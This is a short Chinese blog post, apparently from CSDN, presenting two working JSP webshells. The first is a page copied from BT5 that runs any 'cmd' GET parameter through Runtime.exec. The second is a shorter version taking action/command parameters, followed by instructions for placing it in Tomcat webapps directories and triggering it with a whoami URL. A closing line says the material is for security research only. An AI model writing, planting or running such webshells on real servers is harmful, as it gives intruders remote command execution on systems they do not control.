webshell之简单版本jsp

本文介绍如何从BT5复制并修改一个简单的JSP页面,实现通过GET请求执行命令的功能。利用Java和Runtime类,将用户输入的命令在目标操作系统上执行,并返回执行结果。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

从BT5上复制下来的,简单修改了一下:

<%@ page language="java" contentType="text/html; charset=UTF-8"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<html>
<head>
<title>cmdjsp</title>
</head>
<body>
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>

<%@ page import="java.io.*" %>
<pre>
<%
   String cmd = request.getParameter("cmd");
   String output = "";

   if(cmd != null) {
      String s = null;
      try {
         Process p = null;
         cmd = cmd.replaceAll("\\+", " ");
         if (System.getProperty("os.name").toUpperCase().indexOf("WINDOWS") != -1) {
         	p = Runtime.getRuntime().exec("cmd.exe /C \"" + cmd + "\"");
				 } else {
					p = Runtime.getRuntime().exec( cmd );
				 }
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) {
         		s = s.replaceAll("<", "<");
         		s = s.replaceAll(">", ">");
%>
<%=s%>
<%
         }
         
      }
      catch(IOException e) {
         e.printStackTrace();
      }
   }
%>
</pre>
</body>
</html>


### 部署和运行 JSP WebShell 的过程 JSP WebShell 是一种嵌入到 Java Server Pages (JSP) 文件中的恶意代码,能够执行操作系统命令。下面介绍如何在 Web 服务器上部署并测试一个简单JSP WebShell。 #### 准备工作环境 为了成功部署和运行 JSP WebShell,需要确保已经安装配置好支持 JSP 页面解析的 Web 容器,比如 Apache Tomcat 或者 Jetty 等[^1]。 #### 创建 JSP WebShell 文件 创建一个新的 .jsp 文件,在其中编写如下所示的一段代码: ```jsp <%@ page import="java.io.*, java.util.*"%> <% if ("cmd".equals(request.getParameter("action"))) { String cmd = request.getParameter("command"); Process process = Runtime.getRuntime().exec(cmd); InputStream inputStream = process.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream)); String line; while ((line = reader.readLine()) != null){ out.println(line); } } %> ``` 这段代码定义了一个可以接收 HTTP 请求参数 `action` 和 `command` 的页面逻辑,当接收到特定请求时会尝试去调用操作系统的 shell 命令并将输出返回给浏览器显示。 #### 将文件放置于 Web 应用目录下 把上述编写的 JSP 文件上传至已启动的服务端应用程序根路径下的某个子目录内,例如 `/var/lib/tomcat9/webapps/ROOT/shell.jsp` 对应 Linux 上默认情况下 Tomcat 的 webapp 路径设置;对于 Windows 则可能是类似于 `C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\shell.jsp` 这样的位置。 #### 测试访问效果 通过浏览器或者其他 HTTP 工具向该 URL 发送带有相应参数值的 GET 或 POST 请求来进行验证,如 http://localhost:8080/shell.jsp?action=cmd&command=whoami ,这将会触发服务端执行 whoami 指令,并将结果反馈回客户端展示出来。 请注意,以上内容仅用于安全研究目的的学习交流,请勿非法入侵任何计算机信息系统!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值